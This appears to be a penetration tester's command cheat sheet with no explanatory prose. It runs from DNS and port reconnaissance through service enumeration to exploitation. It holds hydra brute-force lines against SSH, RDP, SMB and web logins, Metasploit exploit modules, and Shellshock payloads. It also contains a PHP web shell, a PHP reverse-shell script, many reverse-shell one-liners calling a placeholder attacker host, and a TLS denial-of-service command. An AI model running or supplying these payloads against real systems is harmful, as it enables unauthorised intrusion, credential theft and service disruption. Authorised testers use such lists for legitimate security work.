script engagement_x.log ... exit # when finished
$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png'
$ export ip=target_ip
$ nmap --script exploit -Pn $ip
$ host -t ns guif.re
$ host -t mx guif.re
$ for ip in $(cat list.txt); do host $ip.guif.re; done
$ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
$ host -l guif.re ns1.guif.re
$ dnsrecon -d guif.re -t axfr
$ host -t ns guif.re | cut -d " " -f 4 #
$ dnsenum guif.re
$ nmap guif.re --script=dns-zone-transfer -p 53
$ whois guif.re
$ nslookup guif.re
$ python theHarvester.py -l 500 -b all -d guif.re
#!/bin/bash
nmap $1 -F # first, quick scan
nmap -sV -A -O -T4 -sC $1 # verify services, Os, run scripts
nmap -p 1-65535 -T5 -sT $1 # scan all ports TCP
nmap -p 1-10000 -T4 -sU $1 # UDP scan
nmap -sP 192.168.0.1/24
$ nmap -p 1-65535 -T4 -sS $ip
$ sudo nmap -sV -A -O -T4 $ip
$ nmap -nvv -w 1 IP 22-8
$ nmap -nvv -sU -w 1 $ip 22-81
$ arp-scan 10.10.10.1/28 -I eth0
$ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24
$ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24
$ nmap -sV $ip
$ nmap -sC $ip
$ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip
$ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201
$ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip
$ amap -d $ip <port>
$ nmblookup -A $ip
$ enum4linux -a $ip
$ nbtscan -r $ip
msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
$ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
$ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
$ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
$ smbclient //$ip/share -U username
$ smbclient //$ip/share # hit enter with blank password
$ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
> set SMBDirect false
$ nmap -Pn -sUC -p137 $ip
$ showmount -e $ip
$ mount $ip:/vol/share /mnt/nfs
$ nikto -host $ip
$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster dir -u http://$ip -w Top1000-RobotsDisallowed.txt
$ wfuzz -c -z list.txt --sc 200 http://$ip
$ dirb $ip /usr/share/wordlists/dirb/common.txt
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u $ip
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
$ cd /root/dirsearch; python3 dirsearch.py -u http://$ip/ -e .php
./whatweb $ip # identifies all known services
$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip
$ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
$ nikto -host http://$ip
$ nmap --script=http-vuln* $ip
sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql
$ nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
$ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
$ davtest -move -sendbd auto -url http://$ip:8080/webdav/
$ cadaver http://$ip:8080/webdav/
$ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
$ nmap -sV -Pn -vv -script=mysql* $ip -p 3306
$ sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
mysql> select do_system('id'); mysql> \! sh
msf > use auxiliary/scanner/mssql/mssql_ping $ nmap -sU --script=ms-sql-info $ip
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
# root@kali:~/dirsearch# cat ../.freetds.conf [someserver] host = $ip port = 1433 tds version = 8.0 user=sa root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
$ nmap -p6379 --script redis-info $ip
$ redis-cli -h $ip
$ nmap -p11211 --script memcached-info $ip
msf > use auxiliary/gather/memcached_extractor
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
>use auxiliary/scanner/smtp/smtp_enum
>VRFY root
>EXPN root
$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
$ hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
use auxiliary/scanner/smtp/smtp_enum
telnet $ip 25 EHLO root MAIL FROM:root@target.com RCPT TO:example@gmail.com DATA Subject: Testing open mail relay. Testing SMTP open mail relay. Have a nice day. . QUIT
$ rpcinfo -p $ip
$ nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom
$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
$ msfconsole -q msf> search type:auxiliary login msf> use auxiliary/scanner/ftp/ftp_login
$ nmap --script=ftp-* -p 21 $ip
$ tftp $ip tftp> ls ?Invalid command tftp> verbose Verbose mode on. tftp> put shell.php Sent 3605 bytes in 0.0 seconds [inf bits/sec]
msf > use auxiliary/scanner/ssh/ssh_enumusers
$ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
$ hydra -v -V -l root -P password-file.txt $ip ssh
$ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
$ openssl s_client -connect $ip:443
$ nmap --script ssl-enum-ciphers -p 443 $ip
$ for community in public private manager; do snmpwalk -c $community -v1 $ip; done
$ snmpwalk -c public -v1 $ip
$ snmpenum $ip public windows.txt
$ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
$ nmap -sU --open -p 161 10.1.1.1-254 -oG out.txt
$ snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
$ snmpwalk -c public -v 2c 10.1.1.1 # version 2
$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
$ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
$ snmp-check -t $ip -c public
$ onesixtyone -c dict.txt -i $ip
use auxiliary/scanner/snmp/cisco_config_tftp
telnet $ip 110 USER uer@$ip PASS admin list retr 1
$ finger-user-enum.pl -U users.txt -t $ip
$ ncrack -vv --user administrator -P password-file.txt rdp://$ip
$ hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
$ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
$ kerbcrack
$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
$ Mimikatz
$ theharvester -d $ip -b google
$ whois $ip
$ recon-ng; use module; set DOMAIN $ip; run; recon/contacts/gather/http/api/whois_pocs
recon/hosts/enum/http/web/xssed
recon/hosts/gather/http/web/google_site
recon/hosts/gather/http/web/ip_neighbor
$ searchsploit --exclude=dos -t apache 2.2.3
$ msfconsole; > search apache 2.2.3
$ nmap -v -T4 --script="*-vuln-*" $ip
$ openvas-setup; openvas-adduser; gsd
$ hash-identifier
$ john hashes.txt
$ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
$ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined
$ crunch 6 6 0123456789ABCDEF -o crunch1.txt
https://crackstation.net/ http://www.cmd5.org/ http://crackhash.com/ https://hashkiller.co.uk/md5-decrypter.aspx https://www.onlinehashcrack.com/ http://rainbowtables.it64.com/ http://www.md5online.org/
$ curl -O http://host/file
$ curl --upload-file shell.php --url http://$ip/shell.php --http1.0
$ python -m SimpleHTTPServer
$ php -S $ip:80
$ nc -nlvp 4444 > incoming.exe
use auxiliary/server/ftp auxiliary/server/tftp
python smbserver.py WORKSPACE /dir
$ curl -T 'file' 'http://$ip'
smbclient -L 1.1.1.1 --no-pass
$ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
$ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
$ ssh username@$ip '() { :;}; /bin/bash'
$ sslscan $ip:443
$ sshuttle -r root@$ip 10.10.10.0/24
$ ssh gateway_host -L local_port:remote_host:remote_port
$ ssh hop_machine -L 31337:banned_machine:22 $ ssh -p 31337 localhost
$ ssh <gateway> -R <remote port to bind>:<local host>:<local port>
$ ssh -D local_port remote_add
allow *_ internal IP_SAME_NETWORK external IP_OTHER_NETWORK socks -p1081
socks4 IP_SAME_NETWORK 1081
$ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
$ ssh -f -N -D 9050 root@10.1.2.1
socks4 127.0.0.1 9050
$ proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22
socks4 127.0.0.1 10050
$ proxychains nmap -sTV -n -PN 10.1.2.1 -254
http://www.cvedetails.com/ https://www.exploit-db.com/
/usr/share/seclists/ /usr/share/wordlist/ /usr/share/metasploit-framework/data/wordlists/
$ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
<?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>
/usr/share/webshells/...
/usr/share/webshells/php/php-reverse-shell.php
<?php echo 'running shell'; $ip='YOUR_IP'; $port='YOUR_PORT'; $reverse_shells = array( '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1', '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196', '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash', 'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe', "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", 'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p', 'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' ); foreach ($reverse_shells as $reverse_shell) { try {echo system($reverse_shell);} catch (Exception $e) {echo $e;} try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;} try {exec($reverse_shell);} catch (Exception $e) {echo $e;} } system('id'); ?>
nc <attacker_ip> <port> -e /bin/bash
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#!/usr/bin/python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("IP",port)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
http:// http:// connect:// sock4:// sock5://
$ nmap -Pn -sSV -p1723 $ip
$ cat dic.txt | thc-pptp-bruter -u admin $ip
$ ike-scan -q $iprange
$ python prober.py $ip
$ nmap --script ssl-enum-ciphers -p443
$ nmap -p443 --script ssl-cert
$ nmap -p443 --script ssl-known-key $1
$ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv
$ thc-ssl-dos $ip